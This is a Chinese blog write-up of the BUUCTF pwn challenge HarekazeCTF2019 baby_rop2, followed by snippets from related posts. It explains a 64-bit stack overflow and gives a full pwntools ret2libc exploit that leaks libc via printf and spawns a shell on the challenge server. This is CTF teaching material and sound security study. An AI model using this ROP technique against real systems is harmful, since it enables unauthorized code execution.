[HarekazeCTF2019]baby_rop2【BUUCTF】

最新推荐文章于 2024-08-28 11:29:07 发布
最新推荐文章于 2024-08-28 11:29:07 发布
阅读量386 收藏
点赞数
分类专栏: CTF训练 Linux PWN 文章标签: 安全 linux PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126670130
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 15 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

[HarekazeCTF2019]baby_rop2
开启NX,64位,动态编译,并且给了libc,那估计就是ret2libc的题目了,IDA分析:
在这里插入图片描述
明显存在栈溢出,那么就是找system和/bin/sh的问题了,该题给了libc,那就是泄露出真实的libc载入基址本题即可求解。
由于本题是64位的,因此参数要写入寄存器中,顺序为rdi,rsi,rdx,rcx,r8,r9

from pwn import *
context.log_level = True
io=remote("node4.buuoj.cn", 27641)
elf = ELF("./babyrop2")
libc = ELF("./libc.so.6")

printf_plt = elf.plt["printf"]
read_got = elf.got["read"]
main_addr = elf.symbols["main"]
pop_rid_ret = 0x400733
pop_rsi_r15_ret= 0x400731
print_format_str = 0x400770
payload = b'A'*(0x20+8)+p64(pop_rid_ret)+p64(print_format_str)+p64(pop_rsi_r15_ret)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_addr)
io.sendlineafter("name? ",payload)
io.recvline()
io.recvuntil("Welcome to the Pwn World again, ")
read_addr = u64(io.recv(6).ljust(8,b'\x00'))
# read_addr = u64(io.recvuntil('\x7f')[-6:].ljust(0x8,b'\x00'))  # 其实用这个更好
log.info("read_addr: "+hex(read_addr))
libc_base = read_addr - libc.symbols["read"]
system_addr = libc_base + libc.symbols["system"]
str_bin_sh = libc_base + next(libc.search(b'bin/sh'))
payload = b'A'*(0x28) + p64(pop_rid_ret) + p64(str_bin_sh) + p64(system_addr)
io.recv()
io.sendline(payload)
io.interactive()
Mokapeng
关注
专栏目录
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1700
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
[HarekazeCTF2019]baby_rop2
m0_52231248的博客
11-16 915
[HarekazeCTF2019]baby_rop2 Checksec: Ida: 很容易看到read存在溢出,offest=0x28 程序中没有system函数和sh字段我们要用ret2libc绕过nx保护 程序中存在printf函数我们用它来泄漏libc基址 先找到printf需要填的rdi和rsi Exp: from pwn import * from LibcSearcher import * context.log_level='debug' r=remote("n
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 407
IDA Pro 静态调试。依旧可以使用上次的PoC。
HarekazeCTF2019 baby_rop
最新发布
m0_73743784的博客
08-28 169
非常经典的 ROP。
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 505
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
buuctf [HarekazeCTF2019]baby_rop2
carol2358的博客
04-21 460
一道常规的泄漏libc然后rop的题目 exp: from pwn import * from LibcSearcher import * local_file = './babyrop2' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 if select == 0: r = proce...
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 4425
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2617
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
buuctf pwn [HarekazeCTF2019]baby_rop2
weixin_45441024的博客
12-03 489
buuctf pwn [HarekazeCTF2019]baby_rop2 ret2libc 老样子还是先check一下,发现开启了NX,说明我们不能利用ret2shellcode了,将文件放到IDA里面来分析一下 题目中有%s字符的字样,我们就想到了利用格式化字符串来泄露某个函数的真实地址,来找到libc的版本,最后拼接出一个system("/bin/sh")来获取shell,通过上图我们找到了溢出点在read函数,buf距离栈底的高度为0x20 因为这是一个64位的程序,其参数是通过寄存器来传递的,
HarekazeCTF2019 baby_rop2
pondzhang的专栏
05-07 258
from pwn import * p = process('./babyrop2') libcelf = ELF('./libc-2.23.so') p = process('./babyrop2') p.recvuntil("What's your name? ") pltprintf = 0x00000000004004F0 gotread = 0x0000000000601020 popr...
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 299
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
buuctf27 [HarekazeCTF2019]baby_rop2 1
weixin_74861133的博客
11-20 234
只开启了NX保护。
BUU-[HarekazeCTF2019]baby_rop
qq_45771413的博客
04-27 1566
查看保护 IDA scanf没限制输入长度,这里可以溢出v4 寻找system和敏感字符串: 都找到了,看来可以缝合缝合了。 解题 这次还是rop,但是还是查阅了相关资料,比第一次做时理解要深刻点。也会用寻找ret返回的工具: ROPgadget ROP相关概念: ROP就是使用返回指令ret连接代码的一种技术 (同理还可以使用jmp系列指令和call指令,有时候也会对应地成为JOP/COP)。 一个程序中必然会存在函数,而有函数就会有ret指令。 而ret指令的本质是pop eip,即把当前栈顶的内
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值